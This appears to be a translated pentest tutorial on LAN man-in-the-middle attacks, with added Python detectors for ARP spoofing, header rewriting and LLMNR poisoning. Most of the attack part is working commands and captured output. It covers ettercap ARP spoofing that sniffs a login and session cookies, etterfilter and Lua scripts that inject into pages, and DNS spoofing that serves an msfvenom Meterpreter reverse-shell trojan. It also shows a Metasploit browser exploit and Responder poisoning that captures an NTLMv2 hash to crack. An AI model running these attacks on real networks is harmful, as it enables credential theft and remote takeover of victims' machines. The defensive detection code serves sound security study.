ARP spoofing: impersonate the gateway and intercept all traffic that leaves the local network.
DNS spoofing: craft an incorrect response to the DNS name-to-IP resolution, which tricks the user into fetching malicious data from the attacker's server or visiting a malicious site.
Ettercap ARP spoofing against a Windows 7 host on the LAN:
ettercap can dissect many protocol types.
Official site: http://www.ettercap-project.org/
GitHub: https://github.com/Ettercap/ettercap
# -T text mode; -q quiet; -M arp:remote perform ARP spoofing; first target: gateway IP, second target: victim IP. The space bar leaves quiet mode, pressing it again turns quiet mode back on
~# ettercap -T -q -M arp:remote /192.168.2.1// /192.168.2.110//
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
Packet visualization restarted...
# press space to show the traffic
TCP 192.168.2.110:50075 --> 125.39.174.72:80 | AP (1248)
POST /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1 HTTP/1.1.
Host: mcar.cc.
Connection: keep-alive.
Content-Length: 83.
Cache-Control: max-age=0.
Origin: http://mcar.cc.
Upgrade-Insecure-Requests: 1.
Content-Type: application/x-www-form-urlencoded.
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.
Referer: http://mcar.cc/forum.php?mod=forumdisplay&fid=129&filter=lastpost&orderby=lastpost.
Accept-Encoding: gzip, deflate.
Accept-Language: zh-CN,zh;q=0.9.
Cookie: __cfduid=d23867c9e4dfa44b774d10fc8d1f098ef1535437947; BRFN_2132_saltkey=DbYGPgqu; BRFN_2132_lastvisit=1535434325; BRFN_2132_st_t=0%7C1535437925%7Cd2135a73018d87aa490392bfc6cc6858; BRFN_2132_forum_lastvisit=D_129_1535437925; BRFN_2132_visitedfid=129; BRFN_2132_sendmail=1; Hm_lvt_0b784c51f644f59deba6e333b56c5c72=1535437951; Hm_lpvt_0b784c51f644f59deba6e333b56c5c72=1535437951; yjs_id=e07ffa8d5d54a6fdbd1cef9fceccd890; ctrl_time=1; BRFN_2132_lastact=1535437999%09member.php%09logging.
.
fastloginfield=username&username=admin&password=admin&quickforward=yes&handlekey=ls
HTTP : 125.39.174.72:80 -> USER: admin PASS: admin INFO: http://mcar.cc/forum.php?mod=forumdisplay&fid=129&filter=lastpost&orderby=lastpost
CONTENT: fastloginfield=username&username=admin&password=admin&quickforward=yes&handlekey=ls
# the username and password are visible in the traffic above
# ettercap -m ettercap.log -w ettercap.pcap -T -q -M arp:remote /192.168.2.1// /192.168.2.110//    -m writes messages to a text log, -w saves the captured traffic to a pcap for later replay; see -h for more options
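On the defending side, the arp:remote attack above leaves two visible traces in ARP traffic: the gateway IP suddenly answers from a new MAC, and one MAC claims both the gateway and the victim. This added Python example (not part of the original notes) parses raw ARP replies and raises those alerts; the frames, MAC addresses and the `ArpWatch` class are constructed for the demo.

```python
import struct
from collections import defaultdict

def arp_frame(sender_mac, sender_ip, target_mac, target_ip, op=2):
    """Build an Ethernet II + ARP frame; used here only to construct sample input."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    ip = lambda a: bytes(int(o) for o in a.split("."))
    eth = mac(target_mac) + mac(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return eth + arp + mac(sender_mac) + ip(sender_ip) + mac(target_mac) + ip(target_ip)

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return op, sender_mac, sender_ip

class ArpWatch:
    """Track IP->MAC bindings from ARP replies and report the two symptoms of
    arp:remote: the gateway's MAC changes, and one MAC answers for several IPs."""
    def __init__(self, gateway_ip, gateway_mac):
        self.gateway_ip = gateway_ip
        self.bindings = {gateway_ip: gateway_mac.lower()}  # known-good, e.g. from DHCP
        self.ips_by_mac = defaultdict(set)
    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:  # only replies assert a binding
            return []
        _, mac, ip = parsed
        alerts = []
        known = self.bindings.setdefault(ip, mac)  # first binding seen is kept
        if known != mac:
            who = "GATEWAY" if ip == self.gateway_ip else "HOST"
            alerts.append(f"{who} {ip} moved from {known} to {mac}")
        self.ips_by_mac[mac].add(ip)
        if len(self.ips_by_mac[mac]) > 1:
            alerts.append(f"{mac} claims {sorted(self.ips_by_mac[mac])}")
        return alerts

def demo():
    """Constructed replay: a legitimate gateway reply, then a rogue MAC claiming the gateway and the victim."""
    watch = ArpWatch("192.168.2.1", "00:11:22:33:44:55")
    frames = [
        arp_frame("00:11:22:33:44:55", "192.168.2.1", "00:0c:29:aa:bb:cc", "192.168.2.110"),
        arp_frame("de:ad:be:ef:00:01", "192.168.2.1", "00:0c:29:aa:bb:cc", "192.168.2.110"),
        arp_frame("de:ad:be:ef:00:01", "192.168.2.110", "00:11:22:33:44:55", "192.168.2.1"),
    ]
    return [alert for frame in frames for alert in watch.observe(frame)]
```

On a live segment the same `observe()` is fed frames from a raw socket or a pcap; a static ARP entry for the gateway on the client is the matching mitigation.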
The first way to manipulate the intercepted traffic is the Etterfilter framework, which is used here to inject the BeEF hook, add malicious code, or downgrade HTTPS.
The second is the powerful Lua scripting language, used to manipulate the data directly.
# test.filter
# Request towards port 80: force an uncompressed response so that the
# reply body can be matched and rewritten without decompressing it
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        pcre_regex(DATA.data, "(Accept-Encoding:).*([\r\n])", "$1 identity$2");
        msg("=");
    }
}
# Response from port 80: rewrite the closing head tag. The tag must be
# captured in parentheses, otherwise "$1" has nothing to refer to and the
# filter aborts with "Too many marker for this pcre expression". The content
# the original placed in front of $1 did not survive on this page.
if (ip.proto == TCP && tcp.src == 80) {
    if (pcre_regex(DATA.data, "<\/head>")) {
        pcre_regex(DATA.data, "(<\/head>)", "$1");
        msg("+");
    }
}
Compile the filter: etterfilter -o test.ef test.filter
Run: ~# ettercap -T -q -M arp:remote -F test.ef /192.168.2.1// /192.168.2.110//    # an absolute path to the filter also works
Visit the site and the injected content is visible:
Packet visualization stopped...
=
=
JIT FILTER FAULT: Too many marker for this pcre expression
+
=
=
=
JIT FILTER FAULT: Too many marker for this pcre expression
+
=
=
=
=
The rule checks that the packet is TCP on port 80. search() tests whether it contains Accept-Encoding; if so, the header is rewritten so that the response comes back uncompressed and the reply body does not have to be decompressed, and msg() prints a marker showing that the rule fired. The injection rule looks for the head tag and inserts a script that opens a pop-up.
Lua script:
ettercap -T -q -M arp:remote --lua-script=test.lua /192.168.2.1// /192.168.2.110//
-- test.lua: ettercap Lua script. description, hook_point, packetrule and
-- action are the fields ettercap's Lua loader expects.
description = "Injection Script using Lua"
local hooks = require("hook_points")
local packet = require("packet")
-- content to insert into the page; left empty here
inject = ""
hook_point = hooks.filter
-- only handle TCP segments that carry data to or from port 80
packetrule = function(packet_object)
  return(packet_object:is_tcp() and
         packet_object:has_data() and
         (packet_object:dst_port() == 80 or
          packet_object:src_port() == 80))
end
action = function(packet_object)
  local p = packet_object
  local data = p:read_data()
  -- request side: replace the Accept-Encoding value with "identity", padded
  -- with spaces so the segment keeps its original length (e - s + 1 bytes)
  -- and the TCP sequence numbers stay valid; the new line is 27 bytes + padding
  if string.find(data, "Accept.Encoding:") then
    local s, e = string.find(data, 'Accept.Encoding:.-\n')
    local newdata = string.gsub(data, "Accept.Encoding:.-\n",
      "Accept-Encoding: identity" .. string.rep(" ", e - s + 1 - 27) .. "\r\n")
    packet.set_data(p, newdata)
    ettercap.log("Downgraded Encoding")
    return
  end
  -- response side: locate the title in the upper-cased HTML, rebuild that region
  -- from the title plus the injected content, and pad with spaces to the original
  -- length. The HTML tag patterns in the four calls below did not survive on this page.
  local body = string.upper(data)
  if (string.find(body, '')) then
    local s, e = string.find(body, '.- ')
    if s then
      local title = string.sub(data, s, e)
      s, e = string.find(body, ".-")
      if not s or not e then
        return
      end
      local len = e - s
      local idata = "" .. title .. inject .. ""
      local newstr = string.sub(data, 1, s - 1) .. idata ..
        string.rep(" ", len - string.len(idata)) .. string.sub(data, e + 1, -1)
      ettercap.log("Updating string")
      packet.set_data(p, newstr)
    end
  end
end
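Both rewrites above leave artefacts a proxy or IDS can look for: the forced `identity` encoding in the request and, for the length-preserving Lua rewrite, solid runs of padding spaces. This added example (not from the page) implements those two checks over a constructed request and a constructed HTML body; the sample values and the function names are mine.

```python
import re

# Constructed sample request (not the page's capture) as it looks after a
# length-preserving rewrite such as the Lua script above: "gzip, deflate"
# became "identity" plus the spaces needed to keep the line at its old length.
SAMPLE_REQUEST = (
    "GET /forum.php HTTP/1.1\r\n"
    + "Host: example.test\r\n"
    + "Accept-Encoding: identity" + " " * 5 + "\r\n"
    + "User-Agent: Mozilla/5.0\r\n"
    + "\r\n"
)

# Constructed response body: the head region was rebuilt and padded with spaces
# so that the TCP segment kept its original length.
SAMPLE_HTML = "<html><head><title>Forum</title></head>" + " " * 40 + "<body>x</body></html>"

def header_findings(raw_request):
    """Flag Accept-Encoding lines that look rewritten in place (trailing space
    padding) or that refuse compression outright (identity only)."""
    findings = []
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "accept-encoding":
            continue
        if value.endswith(" "):
            findings.append(f"padded header: {len(value) - len(value.rstrip())} trailing spaces")
        if value.strip().lower() == "identity":
            findings.append("compression refused: Accept-Encoding is identity only")
    return findings

def html_findings(body, min_run=8):
    """Flag solid runs of spaces right after </title> or </head>. Real indentation
    uses newlines plus a few spaces; in-place injection leaves a long flat run."""
    pattern = r"(</title>|</head>)( {%d,})" % min_run
    return [f"{m.group(1)} followed by {len(m.group(2))} spaces"
            for m in re.finditer(pattern, body, re.I)]
```

Both checks are heuristics: an identity-only header on its own is legal HTTP and is only a weak signal, while the trailing padding is the strong one.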
The first way to spoof DNS is cache poisoning: inject a new DNS name record into the resolver's cache.
The second is ARP poisoning: after spoofing, answer the DNS requests yourself. This requires being on the same subnet as the target.
Ettercap DNS spoofing:
Get the target to download a malicious program: generate a trojan, put it in Apache's /var/www/html/, and start apache2.
The generated exe file needs the site to redirect to the download; generating a PHP trojan together with other web pages works better.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.109 LPORT=4444 -f exe > test.exe
Edit /etc/ettercap/etter.dns. For HTTPS, the connection must first be downgraded to HTTP for the spoofed record to take effect.
When the target opens a web page, the name resolves to the specified site.
################################
# microsoft sucks ;)
# redirect it to www.linux.org
# a specific domain name can be given here instead of the wildcard
* A 192.168.2.109
* PTR 192.168.2.109
##########################################
Start ettercap:
ettercap -T -q -M arp:remote -P dns_spoof /192.168.2.1// /192.168.2.110//
Any kind of trojan can be generated and hosted on the site.
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.2.109:4444
[*] Sending stage (206403 bytes) to 192.168.2.110
[*] Meterpreter session 2 opened (192.168.2.109:4444 -> 192.168.2.110:51046) at 2018-08-29 13:57:44 +0800
meterpreter >
evilgrade tool: https://tools.kali.org/sniffingspoofing/isr-evilgrade
It injects fake updates and ships many modules; install with apt-get install isr-evilgrade.
Watch the GET requests the target machine sends and their Host header, which goes into an entry of the form XXX.XXX A LHOST. This approach is rather limited; pairing it with a trojan .exe file is a very good combination.
Using the IE "Aurora" vulnerability MS10-002:
msf > db_status
[*] postgresql connected to msf
msf > search ms10_002
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
exploit/windows/browser/ms10_002_ie_object 2010-01-21 normal MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/ms10_002_aurora) > show options
msf exploit(windows/browser/ms10_002_aurora) > set LHOST 192.168.2.109
LHOST => 192.168.2.109
msf exploit(windows/browser/ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.2.109:443
msf exploit(windows/browser/ms10_002_aurora) > [*] Using URL: http://0.0.0.0:8080/wMg2vf
[*] Local IP: http://192.168.2.109:8080/wMg2vf
[*] Server started.
msf exploit(windows/browser/ms10_002_aurora) >
It did not succeed!!! SET or BeEF could be tried instead.
NetBIOS spoofing and LLMNR spoofing:
NetBIOS and LLMNR are the name-resolution protocols Microsoft designed for workgroups and domains. When DNS resolution fails, Windows falls back to NetBIOS and LLMNR to look up the name.
NetBIOS is broadcast-based and LLMNR is multicast-based; LLMNR supports IPv6, NetBIOS does not.
Attacking with Responder. GitHub: https://github.com/lgandx/Responder
Start it:
responder -I wlan0 -rPv
In Windows, open a browser and enter an address that does not exist, such as \\fuck; the requests it sends show up:
[*] [LLMNR] Poisoned answer sent to 192.168.2.110 for name fuck
[*] [LLMNR] Poisoned answer sent to 192.168.2.110 for name fuck
[SMBv2] NTLMv2-SSP Client : 192.168.2.110
[SMBv2] NTLMv2-SSP Username : ADMIN\Administrator
[SMBv2] NTLMv2-SSP Hash : Administrator::ADMIN:955d0626db69b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
The captured credentials are written under /usr/share/responder/logs/; let it run for a few more minutes to collect more credentials.
Then john can be used to crack the NTLMv2 hashes.
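Both the LLMNR poisoning just shown and the etter.dns wildcard earlier are detectable from the defender's side with the same DNS wire-format code, because LLMNR reuses DNS messages. This added example (not from the page, Responder or ettercap) builds a query, parses A answers, probes for a poisoner with a random "honeyname" that no legitimate host owns, and flags the wildcard pattern where unrelated names all resolve to one address; the `probe-` prefix and the threshold of three names are assumptions.

```python
import os, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 link-local multicast

def build_query(name, qid):
    """One-question A/IN query. LLMNR reuses the DNS wire format (RD bit clear)."""
    labels = b"".join(bytes([len(p)]) + p.encode() for p in name.split("."))
    return struct.pack("!HHHHHH", qid, 0, 1, 0, 0, 0) + labels + b"\x00" + struct.pack("!HH", 1, 1)

def parse_a_answers(msg):
    """Return (id, [IPv4 answers]) from a DNS/LLMNR response; other RR types are skipped."""
    qid, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    def skip_name(pos):
        while True:
            length = msg[pos]
            if length == 0:
                return pos + 1
            if length & 0xC0 == 0xC0:  # compression pointer: two bytes, then done
                return pos + 2
            pos += 1 + length
    pos = 12
    for _ in range(qdcount):
        pos = skip_name(pos) + 4  # skip QTYPE and QCLASS
    ips = []
    for _ in range(ancount):
        pos = skip_name(pos)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(msg[pos:pos + 4]))
        pos += rdlen
    return qid, ips

def llmnr_honeyname_probe(timeout=2.0):
    """Ask LLMNR for a random name no real host owns; any answer means a poisoner."""
    name = "probe-" + os.urandom(4).hex()  # assumed prefix; the randomness is what matters
    qid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, qid), (LLMNR_GROUP, LLMNR_PORT))
    try:
        data, (src, _) = sock.recvfrom(512)
    except socket.timeout:
        return None  # silence is the healthy result
    rid, ips = parse_a_answers(data)
    return {"poisoner": src, "name": name, "answers": ips} if rid == qid else None

def wildcard_spoof_suspected(answers_by_name, min_names=3):
    """etter.dns '* A <ip>' makes unrelated names collapse onto one address; flag that."""
    answered = [frozenset(a) for a in answers_by_name.values() if a]
    return len(answered) >= min_names and len(set(answered)) == 1
```

Run `llmnr_honeyname_probe()` from a host on the segment under test; it returns None when nobody answers and the answering address otherwise, and disabling LLMNR/NBT-NS by policy removes the attack surface entirely.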